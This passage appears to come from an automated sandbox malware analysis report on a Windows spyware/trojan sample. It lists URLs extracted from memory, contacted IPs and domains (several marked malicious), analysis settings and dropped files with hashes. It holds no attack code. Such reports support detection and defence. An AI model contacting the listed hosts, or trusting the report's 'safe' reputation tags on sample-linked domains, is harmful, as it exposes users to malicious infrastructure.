                                                          http://www.fontbureau.comliciuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.fontbureau.comI.TTF:iuvRyl9i7D.exe, 00000000.00000003.252077012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253383810.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253224001.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253128451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253153122.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253083922.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253314080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253110391.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253363848.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2Ccontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/favicon.icocontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.carterandcone.comliuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://randu.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/yiuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.founder.com.cn/cn.iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://www.jiyu-kobo.co.jp/Y0(iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://www.fontbureau.com/designers/frere-user.htmliuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://en.wi5iuvRyl9i7D.exe, 00000000.00000003.247473983.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://shangeng.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.jiyu-kobo.co.jp/riuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.jiyu-kobo.co.jp/oiuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.jiyu-kobo.co.jp/niuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goocontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cn5iuvRyl9i7D.exe, 00000000.00000003.247148991.0000000005F2E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://weimen.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://consent.google.com/set?pc=s&uxe=4421591control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://consent.google.com/set?pc=s&uxe=4421591LMEMcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3ktcontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://mianta.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.fontbureau.com/designersGiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fontbureau.comFUiuvRyl9i7D.exe, 00000000.00000003.251899663.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.fontbureau.comsivaoiuvRyl9i7D.exe, 00000000.00000003.252113020.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.253027717.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252787080.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252731012.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252154816.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252813572.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252591924.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252619646.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252863483.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252961013.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252226605.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252559654.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252648890.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252354121.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252707963.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252193043.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252670155.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252384451.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.252833388.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.carterandcone.comn-uiuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.msn.com/?ocid=iehpLMEMcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fontbureau.com/designers/?iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://rechan.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://wudie.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.founder.com.cn/cn/bTheiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=httpscontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.msn.com/de-ch/?ocid=iehpLMEMhcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.fontbureau.com/designers?iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/intl/en_uk/chrome/Scontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.google.com/searchWcontrol.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fontbureau.com/designersCiuvRyl9i7D.exe, 00000000.00000003.252486470.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.tiro.comiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                http://www.fontbureau.com/designersViuvRyl9i7D.exe, 00000000.00000003.250474688.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250510531.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250493202.0000000005F2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://saoshui.uspplongee.com/control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://www.goodfont.co.kriuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.carterandcone.comiuvRyl9i7D.exe, 00000000.00000003.247847880.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248188896.0000000005F04000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248440340.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248784254.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249091958.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247682105.0000000005F30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.zhongyicts.com.cn)iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  low
                                                                                                  https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.typography.netDiuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://www.google.com/intl/en_uk/chrome/LMEMxcontrol.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs
                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      38.34.163.59
                                                                                                      a6.pingcache.comUnited States
                                                                                                      174COGENT-174UStrue
                                                                                                      35.209.127.155
                                                                                                      www.jamesreadtanusa.comUnited States
                                                                                                      19527GOOGLE-2UStrue
                                                                                                      5.183.8.183
                                                                                                      www.dems-clicks.comGermany
                                                                                                      64463INTERXSCHtrue
                                                                                                      35.241.47.216
                                                                                                      www.bldh45.xyzUnited States
                                                                                                      15169GOOGLEUSfalse
                                                                                                      198.54.116.236
                                                                                                      properscooter.comUnited States
                                                                                                      22612NAMECHEAP-NETUStrue
                                                                                                      198.54.117.216
                                                                                                      parkingpage.namecheap.comUnited States
                                                                                                      22612NAMECHEAP-NETUSfalse
                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                      Analysis ID:626605
                                                                                                      Start date and time: 14/05/202215:27:312022-05-14 15:27:31 +02:00
                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                      Overall analysis duration:0h 13m 47s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:light
                                                                                                      Sample file name:iuvRyl9i7D (renamed file extension from none to exe)
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                      Number of analysed new started processes analysed:34
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:1
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • HDC enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@15/9@7/6
                                                                                                      EGA Information:
                                                                                                      • Successful, ratio: 75%
                                                                                                      HDC Information:
                                                                                                      • Successful, ratio: 18.3% (good quality ratio 16.5%)
                                                                                                      • Quality average: 70.5%
                                                                                                      • Quality standard deviation: 32.2%
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 96%
                                                                                                      • Number of executed functions: 0
                                                                                                      • Number of non-executed functions: 0
                                                                                                      Cookbook Comments:
                                                                                                      • Adjust boot time
                                                                                                      • Enable AMSI
                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                      • TCP Packets have been reduced to 100
                                                                                                      • Excluded IPs from analysis (whitelisted): 20.223.24.244
                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                      • Execution Graph export aborted for target iuvRyl9i7D.exe, PID 6804 because there are no executed function
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      TimeTypeDescription
                                                                                                      15:28:48API Interceptor1x Sleep call for process: iuvRyl9i7D.exe modified
                                                                                                      15:28:56API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Users\user\Desktop\iuvRyl9i7D.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):1308
                                                                                                      Entropy (8bit):5.345811588615766
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4FsXE8:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHJ
                                                                                                      MD5:EA78C102145ED608EF0E407B978AF339
                                                                                                      SHA1:66C9179ED9675B9271A97AB1FC878077E09AB731
                                                                                                      SHA-256:8BF01E0C445BD07C0B4EDC7199B7E17DAF1CA55CA52D4A6EAC4EF211C2B1A73E
                                                                                                      SHA-512:8C04139A1FC3C3BDACB680EC443615A43EB18E73B5A0CFCA644CB4A5E71746B275B3E238DD1A5A205405313E457BB75F9BBB93277C67AFA5D78DCFA30E5DA02B
                                                                                                      Malicious:true
                                                                                                      Reputation:unknown
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):22204
                                                                                                      Entropy (8bit):5.600460279727319
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:ktCDaDXEOrmS6mqBXDbFRYSgQjultI8M7nvng3hInYML+CfmAV7QWdy5ZQvnI++R:eo9B/IUCltPo66DK2ps+8
                                                                                                      MD5:B37685386C11149B349B3D36F3272C90
                                                                                                      SHA1:0226975575203F0CD37C354F3AD0E487282B1D43
                                                                                                      SHA-256:28D1714B9C88A5CC6E75003C38FA50BAC871340F109EFAB722EC00F1366A0C34
                                                                                                      SHA-512:CFA1829AF78BD7FD8E3997B0A48542B87F6159E587208F9ADC628BB382CFFC9CA58E98B01C9DD004A88F0C2E26D393E20EA6B0AC0E353D1078D0A6C6B9D6FD83
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:@...e...........g.......K.............M.../..........@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                      File Type:Unknown
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.792852251086831
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:1
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:very short file (no magic)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1
                                                                                                      Entropy (8bit):0.0
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:U:U
